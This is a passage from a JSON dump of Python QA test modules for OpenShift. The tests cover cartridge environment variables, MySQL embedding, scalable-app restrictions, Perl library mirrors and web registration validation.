case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_cmd(self):\n def closure():\n mysql_url = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['url']\n mysql_user = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['username']\n mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['password']\n mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['database']\n cmd_dict = {\n \"jbossas\": \"cd %s\" % (self.git_repo),\n \"php\" : \"cd %s/php && sed -i -e 's/changeme_url/%s/g' mysql.php && sed -i -e 's/changeme_username/%s/g' mysql.php && sed -i -e 's/changeme_password/%s/g' mysql.php && sed -i -e 's/changeme_db/%s/g' mysql.php\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname),\n \"perl\" : \"cd %s/perl && sed -i -e 's/changeme_url/%s/g' mysql.pl && sed -i -e 's/changeme_username/%s/g' mysql.pl && sed -i -e 's/changeme_password/%s/g' mysql.pl && sed -i -e 's/changeme_db/%s/g' mysql.pl\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname),\n \"python\" : \"cd %s/wsgi && sed -i -e 's/changeme_url/%s/g' application && sed -i -e 's/changeme_username/%s/g' application && sed -i -e 's/changeme_password/%s/g' application && sed -i -e 's/changeme_db/%s/g' application\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname),\n \"ruby\" : \"cd %s && sed -i -e 's/changeme_url/%s/g' config.ru && sed -i -e 's/changeme_username/%s/g' config.ru && sed -i -e 's/changeme_password/%s/g' config.ru && sed -i -e 's/changeme_db/%s/g' config.ru\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname)}\n cmd_postfix = \" && git add . ; git commit -am t && git push\"\n cmd = ''.join((cmd_dict[self.test_variant], cmd_postfix))\n return cmd\n\n return closure\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlAfterAlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5761821269989014, "alphanum_fraction": 0.5866900086402893, "avg_line_length": 35.83871078491211, "blob_id": "6aa0304eca8f6938246a55bb31d7e7f25f24a414", "content_id": "04add5cd8132146684a0cf049fd9c2b4c6b58dae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2284, "license_type": "no_license", "max_line_length": 221, "num_lines": 62, "path": "/automation/open/testmodules/RT/scaling/prohibit_jenkins_diy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nMay 9, 2012\n\n[US2089][BI] Prohibit an app of jenkins/diy type from being created as scalable app\nhttps://tcms.engineering.redhat.com/case/145114\n\"\"\"\nimport rhtest\n#### test specific import\nimport common\nimport openshift\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US2089][BI] Prohibit an app of jenkins/diy type from being created as scalable app\"\n self.step = 0\n common.env_setup()\n\n def finalize(self):\n common.clean_up()\n \n\nclass ProhibitScalableJenkinsDiy(OpenShiftTest):\n def test_method(self):\n step = 0\n for app_type in [ common.app_types['jenkins'], common.app_types['diy'] ]:\n self.step = self.step + 1\n self.info(\"==========================================\")\n self.info(\"Creating application via REST API: \" + app_type)\n self.info(\"==========================================\")\n (status, res) = self.config.rest_api.app_create(\"testapp%d\" % self.step, app_type, 'true')\n self.info(\"status=%s, response=%s\"%(status, res))\n self.assert_not_equal(status, 'OK', \"It's possible to create a scalable app via RESt API with type \" + app_type)\n \n self.info(\"==========================================\")\n self.info(\"Creating application in command line: \" + app_type)\n self.info(\"==========================================\")\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"rhc app create testapp%d %s -s --no-git -l %s -p '%s'\" % ( self.step, app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd ))\n\n self.assert_true( ret_code != 0, \"It's possible to create a scalable application with type \" + app_type )\n #self.assert_true( ret_output.find(\"Can not create a scaling app\") != -1, \"Error-message must be meaningful\")\n\n return self.passed(self.summary)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ProhibitScalableJenkinsDiy)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5219117999076843, "alphanum_fraction": 0.5271471738815308, "avg_line_length": 59.2092399597168, "blob_id": "3e3c78022e5c8656a3991c8857d5941a3e433616", "content_id": "bf1f6a4c9bf3dc6895a391596dc30b082cb1a997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22157, "license_type": "no_license", "max_line_length": 278, "num_lines": 368, "path": "/automation/open/testmodules/RT/cartridge/namespaced_env_vars.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-11-09\n\n[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\nhttps://tcms.engineering.redhat.com/case/138803/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\nimport pexpect\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `python` as default\")\n self.test_variant = 'python'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n self.summary = \"[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\"\n self.app_name = \"envvar\" + common.getRandomString(6)\n self.app_type = common.app_types[self.test_variant]\n self.cart = common.type_to_cart(self.app_type)\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass NamespacedEnvVars(OpenShiftTest):\n def get_env_list(self, main_cart, *cart_list):\n env_list = { \"GLOBAL\" : [ (\"removed\", \"OPENSHIFT_GEAR_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_GEAR_DIR\"),\n (\"removed\", \"OPENSHIFT_GEAR_TYPE\"),\n (\"removed\", \"OPENSHIFT_APP_DIR\"),\n (\"removed\", \"OPENSHIFT_APP_TYPE\"),\n (\"unchanged\", \"OPENSHIFT_GEAR_NAME\"),\n (\"translated\", \"OPENSHIFT_RUNTIME_DIR\", \"\"),\n (\"translated\", \"OPENSHIFT_LOG_DIR\", \"OPENSHIFT_%s_LOG_DIR\" % (main_cart)),\n (\"translated\", \"OPENSHIFT_RUN_DIR\", \"\"),\n (\"new\", \"OPENSHIFT_%s_IP\" % (main_cart)),\n (\"new\", \"OPENSHIFT_%s_PORT\" % (main_cart)),\n (\"unchanged\", \"OPENSHIFT_APP_DNS\"),\n (\"unchanged\", \"OPENSHIFT_APP_NAME\"),\n (\"unchanged\", \"OPENSHIFT_APP_UUID\"),\n (\"unchanged\", \"OPENSHIFT_DATA_DIR\"),\n (\"unchanged\", \"OPENSHIFT_GEAR_DNS\"),\n (\"unchanged\", \"OPENSHIFT_GEAR_UUID\"),\n (\"unchanged\", \"OPENSHIFT_HOMEDIR\"),\n #(\"unchanged\", \"OPENSHIFT_INTERNAL_IP\"),\n #(\"unchanged\", \"OPENSHIFT_INTERNAL_PORT\"),\n (\"unchanged\", \"OPENSHIFT_REPO_DIR\"),\n (\"unchanged\", \"OPENSHIFT_TMP_DIR\")],\n \"JBOSSAS\":[ (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER\", \"OPENSHIFT_JBOSSAS_CLUSTER\"),\n (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER_PORT\", \"OPENSHIFT_JBOSSAS_CLUSTER_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER_PROXY_PORT\", \"OPENSHIFT_JBOSSAS_CLUSTER_PROXY_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER_REMOTING\", \"OPENSHIFT_JBOSSAS_CLUSTER_REMOTING\"),\n (\"translated\", \"OPENSHIFT_JBOSS_MESSAGING_PORT\", \"OPENSHIFT_JBOSSAS_MESSAGING_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_MESSAGING_THROUGHPUT_PORT\", \"OPENSHIFT_JBOSSAS_MESSAGING_THROUGHPUT_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_REMOTING_PORT\", \"OPENSHIFT_JBOSSAS_REMOTING_PORT\")],\n \"JENKINS\":[ (\"unchanged\", \"JENKINS_USERNAME\"),\n (\"unchanged\", \"JENKINS_PASSWORD\"),\n (\"unchanged\", \"JENKINS_URL\")],\n \"JENKINSCLIENT\":[(\"unchanged\", \"JENKINS_USERNAME\"),\n (\"unchanged\", \"JENKINS_PASSWORD\"),\n (\"unchanged\", \"JENKINS_URL\"),\n (\"new\", \"OPENSHIFT_JENKINS_CLIENT_DIR\"),\n (\"new\", \"OPENSHIFT_JENKINS_CLIENT_IDENT\")],\n \"HAPROXY\":[ (\"new\", \"OPENSHIFT_HAPROXY_INTERNAL_IP\"),\n (\"new\", \"OPENSHIFT_HAPROXY_STATUS_IP\")],\n \"MYSQL\" : [ (\"removed\", \"OPENSHIFT_DB_CTL_ONGEAR_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_DB_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_DUMP\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_DUMP_CLEANUP\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_PROFILE\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_RESTORE\"),\n (\"removed\", \"OPENSHIFT_DB_TYPE\"),\n (\"translated\", \"OPENSHIFT_DB_HOST\", \"OPENSHIFT_MYSQL_DB_HOST\"),\n (\"translated\", \"OPENSHIFT_DB_PORT\", \"OPENSHIFT_MYSQL_DB_PORT\"),\n (\"translated\", \"OPENSHIFT_DB_USERNAME\", \"OPENSHIFT_MYSQL_DB_USERNAME\"),\n (\"translated\", \"OPENSHIFT_DB_PASSWORD\", \"OPENSHIFT_MYSQL_DB_PASSWORD\"),\n (\"translated\", \"OPENSHIFT_DB_SOCKET\", \"OPENSHIFT_MYSQL_DB_SOCKET\"),\n (\"translated\", \"OPENSHIFT_DB_URL\", \"OPENSHIFT_MYSQL_DB_URL\"),\n (\"new\", \"OPENSHIFT_MYSQL_DB_LOG_DIR\")],\n \"POSTGRESQL\":[ (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_DUMP\"),\n (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_DUMP_CLEANUP\"),\n (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_EMBEDDED_TYPE\"),\n (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_RESTORE\"),\n (\"removed\", \"OPENSHIFT_DB_TYPE\"),\n (\"translated\", \"OPENSHIFT_DB_HOST\", \"OPENSHIFT_POSTGRESQL_DB_HOST\"),\n (\"translated\", \"OPENSHIFT_DB_PORT\", \"OPENSHIFT_POSTGRESQL_DB_PORT\"),\n (\"translated\", \"OPENSHIFT_DB_USERNAME\", \"OPENSHIFT_POSTGRESQL_DB_USERNAME\"),\n (\"translated\", \"OPENSHIFT_DB_PASSWORD\", \"OPENSHIFT_POSTGRESQL_DB_PASSWORD\"),\n (\"translated\", \"OPENSHIFT_DB_SOCKET\", \"OPENSHIFT_POSTGRESQL_DB_SOCKET\"),\n (\"translated\", \"OPENSHIFT_DB_URL\", \"OPENSHIFT_POSTGRESQL_DB_URL\"),\n (\"new\", \"OPENSHIFT_POSTGRESQL_DB_LOG_DIR\")],\n \"MONGODB\":[ (\"removed\", \"OPENSHIFT_NOSQL_DB_CTL_ONGEAR_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_DUMP\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_DUMP_CLEANUP\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_EMBEDDED_TYPE\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_RESTORE\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_TYPE\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_HOST\", \"OPENSHIFT_MONGODB_DB_HOST\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_PASSWORD\", \"OPENSHIFT_MONGODB_DB_PASSWORD\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_PORT\", \"OPENSHIFT_MONGODB_DB_PORT\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_URL\", \"OPENSHIFT_MONGODB_DB_URL\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_USERNAME\", \"OPENSHIFT_MONGODB_DB_USERNAME\"),\n (\"new\", \"OPENSHIFT_MONGODB_DB_LOG_DIR\")],\n \"PHPMYADMIN\":[ (\"new\", \"OPENSHIFT_PHPMYADMIN_IP\"),\n (\"new\", \"OPENSHIFT_PHPMYADMIN_PORT\"),\n (\"new\", \"OPENSHIFT_PHPMYADMIN_LOG_DIR\"),\n (\"removed\", \"OPENSHIFT_PHPMYADMIN_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_PHPMYADMIN_GEAR_DIR\")],\n \"ROCKMONGO\":[ (\"new\", \"OPENSHIFT_ROCKMONGO_LOG_DIR\"),\n (\"new\", \"OPENSHIFT_ROCKMONGO_IP\"),\n (\"new\", \"OPENSHIFT_ROCKMONGO_PORT\"),\n (\"removed\", \"OPENSHIFT_ROCKMONGO_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_ROCKMONGO_GEAR_DIR\")],\n \"10GENMMSAGENT\":[(\"removed\", \"OPENSHIFT_10GEN_MMS_AGENT_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_10GEN_MMS_AGENT_GEAR_DIR\"),\n (\"new\", \"OPENSHIFT_10GENMMSAGENT_IDENT\"),\n (\"new\", \"OPENSHIFT_10GENMMSAGENT_DIR\")],\n \"CRON\": [ (\"removed\", \"OPENSHIFT_BATCH_CRON_14_EMBEDDED_TYPE\"),\n (\"removed\", \"OPENSHIFT_BATCH_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_BATCH_TYPE\")],\n }\n expected_list = []\n unexpected_list = []\n cart_list = list(cart_list)\n cart_list.append(\"GLOBAL\")\n for cart in cart_list:\n for i in env_list.get(cart, []):\n if i[0] == \"unchanged\":\n expected_list.append(i[1])\n elif i[0] == \"translated\":\n expected_list.append(i[2])\n unexpected_list.append(i[1])\n elif i[0] == \"removed\":\n unexpected_list.append(i[1])\n elif i[0] == \"new\":\n expected_list.append(i[1])\n expected_list = list(set(expected_list))\n unexpected_list = list(set(unexpected_list))\n return (expected_list, unexpected_list)\n\n def check_env_var(self, output, expected_list, unexpected_list):\n missing_list = []\n existing_list = []\n for i in expected_list:\n if output.find(i) == -1:\n missing_list.append(i)\n for i in unexpected_list:\n if output.find(i) != -1:\n existing_list.append(i)\n return (missing_list, existing_list)\n\n def check_jenkins_app(self, app_name):\n ssh_url = OSConf.get_ssh_url(app_name)\n print \"ssh url: %s\" % (ssh_url)\n self.ssh_proc = pexpect.spawn(\"ssh -o StrictHostKeyChecking=no -o ConnectTimeout=20 %s 'env'\" % (ssh_url))\n output = self.ssh_proc.read()\n print \"Output: %s\" % (output)\n self.ssh_proc.close()\n expected_list, unexpected_list = self.get_env_list(common.type_to_cart(common.app_types[\"jenkins\"]), common.type_to_cart(common.app_types[\"jenkins\"]))\n print \"Cartridge: %s\" % (common.app_types[\"jenkins\"])\n print \"Expected env var list: %s\" % (','.join(expected_list))\n print \"Unexpected env var list: %s\" % (','.join(unexpected_list))\n missing_list, existing_list = self.check_env_var(output, expected_list, unexpected_list)\n flag = True\n if missing_list != []:\n print \"The following env vars are missing:\"\n print ', '.join(missing_list)\n flag = False\n if existing_list != []:\n print \"The following env vars,which should be removed, still exist:\"\n print ', '.join(existing_list)\n flag = False\n return flag\n\n def check_app(self, app_name, *cart_list):\n app_url = OSConf.get_app_url(app_name)\n common.stop_app(app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n common.start_app(app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n url_postfix_dict = { \"jbossas\" : \"/universal.jsp?group=env\",\n \"php\" : \"/universal.php?group=env\",\n \"ruby\" : \"/env\",\n \"python\" : \"/env\",\n \"perl\" : \"/universal.pl?group=env\",\n \"nodejs\" : \"/env\",\n }\n url_postfix_dict[\"jbosseap\"] = url_postfix_dict[\"jbossas\"]\n url_postfix_dict[\"jbossews\"] = url_postfix_dict[\"jbossas\"]\n url_postfix_dict[\"python-2.7\"] = url_postfix_dict[\"python\"]\n url_postfix_dict[\"python-3.3\"] = url_postfix_dict[\"python\"]\n url_postfix_dict[\"zend\"] = url_postfix_dict[\"php\"]\n url_postfix_dict[\"ruby-1.9\"] = url_postfix_dict[\"ruby\"]\n # Wait for the app to start\n common.grep_web_page(app_url + url_postfix_dict[self.test_variant], \"OPENSHIFT_APP_DNS\")\n content = common.fetch_page(app_url + url_postfix_dict[self.test_variant])\n expected_list, unexpected_list = self.get_env_list(self.cart, *cart_list)\n print \"Cartridge list: %s\" % (','.join(cart_list))\n print \"Expected env var list: %s\" % (','.join(expected_list))\n print \"Unexpected env var list: %s\" % (','.join(unexpected_list))\n missing_list, existing_list = self.check_env_var(content, expected_list, unexpected_list)\n flag = True\n if missing_list != []:\n print \"The following env vars are missing:\"\n print ', '.join(missing_list)\n flag = False\n if existing_list != []:\n print \"The following env vars,which should be removed, still exist:\"\n print ', '.join(existing_list)\n flag = False\n return flag\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n\n src_path_dict = { \"jbossas\" : \"%s/app_template/universal/jbossas/universal.jsp\" % (WORK_DIR),\n \"php\" : \"%s/app_template/universal/php/universal.php\" % (WORK_DIR),\n \"ruby\" : \"%s/app_template/universal/ruby/config.ru\" % (WORK_DIR),\n \"python\" : \"%s/app_template/universal/python/application\" % (WORK_DIR),\n \"python-2.7\" : \"%s/app_template/universal/python-2.7/application\" % (WORK_DIR),\n \"perl\" : \"%s/app_template/universal/perl/universal.pl\" % (WORK_DIR),\n \"nodejs\" : \"%s/app_template/universal/nodejs/server.js\" % (WORK_DIR),\n }\n src_path_dict[\"jbosseap\"] = src_path_dict[\"jbossas\"]\n src_path_dict[\"jbossews\"] = src_path_dict[\"jbossas\"]\n src_path_dict[\"ruby-1.9\"] = src_path_dict[\"ruby\"]\n src_path_dict[\"zend\"] = src_path_dict[\"php\"]\n src_path_dict[\"python-3.3\"] = src_path_dict[\"python\"]\n dst_path_dict = { \"jbossas\" : \"%s/src/main/webapp/\" % (self.app_name),\n \"php\" : \"%s/php/\" % (self.app_name),\n \"ruby\" : \"%s/\" % (self.app_name),\n \"python\" : \"%s/wsgi/\" % (self.app_name),\n \"perl\" : \"%s/perl/\" % (self.app_name),\n \"nodejs\" : \"%s/\" % (self.app_name),\n }\n dst_path_dict[\"jbosseap\"] = dst_path_dict[\"jbossas\"]\n dst_path_dict[\"jbossews\"] = dst_path_dict[\"jbossas\"]\n dst_path_dict[\"ruby-1.9\"] = dst_path_dict[\"ruby\"]\n dst_path_dict[\"zend\"] = dst_path_dict[\"php\"]\n dst_path_dict[\"python-2.7\"] = dst_path_dict[\"python\"]\n dst_path_dict[\"python-3.3\"] = dst_path_dict[\"python\"]\n ret, output = common.command_getstatusoutput('cp -f %s %s && cd %s && git add . && git commit -amt && git push' % (src_path_dict[self.test_variant], dst_path_dict[self.test_variant], self.app_name))\n self.assert_equal(ret, 0, output)\n\n ret = self.check_app(self.app_name, self.cart)\n self.assert_equal(ret, True, \"Env var check failed\")\n\n # Add mysql to app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret, 0, \"Failed to add mysql to app\")\n\n ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mysql\"]))\n self.assert_equal(ret, True, \"mysql env var check failed\")\n\n### # Add phpmyadmin to app\n### ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"phpmyadmin\"])\n### self.assert_equal(ret, 0, \"Failed to add phpmyadmin to app\")\n###\n### ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mysql\"]), common.type_to_cart(common.cartridge_types[\"phpmyadmin\"]))\n### self.assert_equal(ret, True, \"phpmyadmin env var check failed\")\n###\n### ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"phpmyadmin\"])\n### self.assert_equal(ret, 0, \"Failed to remove phpmyadmin to app\")\n###\n### et = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"])\n### elf.assert_equal(ret, 0, \"Failed to remove mysql to app\")\n###\n### Add postgresql to app\n### et = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"postgresql\"])\n### elf.assert_equal(ret, 0, \"Failed to add postgresql to app\")\n###\n### et = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"postgresql\"]))\n### elf.assert_equal(ret, True, \"postgresql env var check failed\")\n###\n### et = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"postgresql\"])\n### elf.assert_equal(ret, 0, \"Failed to remove postgresql to app\")\n###\n### Add mongodb to app\n### ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mongodb\"])\n### self.assert_equal(ret, 0, \"Failed to add mongodb to app\")\n###\n### ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]))\n### self.assert_equal(ret, True, \"mongodb env var check failed\")\n###\n### # Add rockmongo to app\n### ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"rockmongo\"])\n### self.assert_equal(ret, 0, \"Failed to add mongodb to app\")\n###\n### ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]))\n### self.assert_equal(ret, True, \"rockmongo env var check failed\")\n###\n### # Copy settings.py to app repo\n### ret, output = common.command_getstatusoutput('mkdir -p %s/.openshift/mms/ && cp -f %s/app_template/settings.py %s/.openshift/mms && cd %s && git add . && git commit -amt && git push' % (self.app_name, WORK_DIR, self.app_name, self.app_name))\n### self.assert_equal(ret, 0, output)\n###\n### # Add 10gen-mms-agent to app\n### ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"10gen\"])\n### self.assert_equal(ret, 0, \"Failed to add 10gen-mms-agent to app\")\n###\n### ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]), common.type_to_cart(common.cartridge_types[\"10gen\"]))\n### self.assert_equal(ret, True, \"10gen-mms-agent env var check failed\")\n\n # Add cron to app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"cron\"])\n self.assert_equal(ret, 0, \"Failed to add cron to app\")\n\n #ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]), common.type_to_cart(common.cartridge_types[\"cron\"]))\n ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"cron\"]))\n self.assert_equal(ret, True, \"cron env var check failed\")\n\n # Create a jenkins app\n ret = common.create_app(\"server\", common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n\n # Check the jenkins server app\n ret = self.check_jenkins_app(\"server\")\n self.assert_equal(ret, True, \"jenkins server app env var check failed\")\n\n # Add jenkins client to app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"])\n if ret != 0:\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret, 0, \"Failed to add jenkins client to app\")\n\n # Git push the app\n ret = common.trigger_jenkins_build(self.git_repo)\n self.assert_equal(ret, True, \"Failed to trigger jenkins build\")\n\n #ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]), common.type_to_cart(common.cartridge_types[\"cron\"]), common.type_to_cart(common.cartridge_types[\"jenkins\"]))\n ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"cron\"]), common.type_to_cart(common.cartridge_types[\"jenkins\"]))\n self.assert_equal(ret, True, \"cron env var check failed\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NamespacedEnvVars)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5900841355323792, "alphanum_fraction": 0.6020362973213196, "avg_line_length": 31.724637985229492, "blob_id": "fb833db265410e1c5939bddf53eaec67163ba056", "content_id": "5c4b6a0c1d474dec56be4fae0da750486f4b42bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2259, "license_type": "no_license", "max_line_length": 93, "num_lines": 69, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_perl.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 9, 2011\n\n[US1309][rhc-cartridge]Create local lib mirrors for Perl framework\nhttps://tcms.engineering.redhat.com/case/122395/\n\"\"\"\nimport os,sys,re\n\nimport testcase, common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1309][rhc-cartridge]Create local lib mirrors for Perl framework\"\n self.app = { 'name':'perltest', 'type':'perl-5.10' }\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app['name']))\n\nclass LocalLibMirrorsPerl(OpenShiftTest):\n def test_method(self):\n self.steps_list.append( testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Edit deplist.txt\",\n \"echo 'YAML' >> %s/deplist.txt\" % self.app['name'],\n expect_description = \"deplist.txt should be updated successfully\",\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\"git push\",\n \"cd %s && git commit -am test && git push\" % self.app['name'],\n expect_string_list = ['Successfully installed YAML-', 'Fetching http.*perl'],\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalLibMirrorsPerl)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6103633642196655, "alphanum_fraction": 0.6352624297142029, "avg_line_length": 22.203125, "blob_id": "b691b7414737d056611d06d8f3b07fc892eb5e95", "content_id": "45d172fbe10dd07d7e4e5d9aa39438aab1669b08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 135, "num_lines": 64, "path": "/automation/open/testmodules/UI/web/case_122257.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122257.py\n# Date: 2012/07/24 14:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass RegisterWithInvalidEmail(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n\n\t#go to the register page\n web.go_to_register()\n\n\t#register with invalid email\n web.input_by_id(\"web_user_email_address\",'''123''')\n web.input_by_id(\"web_user_password\",\"redhat\")\n web.input_by_id(\"web_user_password_confirmation\",\"redhat\")\n\n #click to sign up\n web.click_element_by_xpath('''//input[@id='web_user_submit']''') \n time.sleep(2)\n web.assert_text_equal_by_xpath('''Please enter a valid email address.''','''//div[@id='web_user_email_address_input']/div/p''')\n\t\t\n\n self.tearDown()\n\n return self.passed(\"Case 122257--register with invalid email test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass 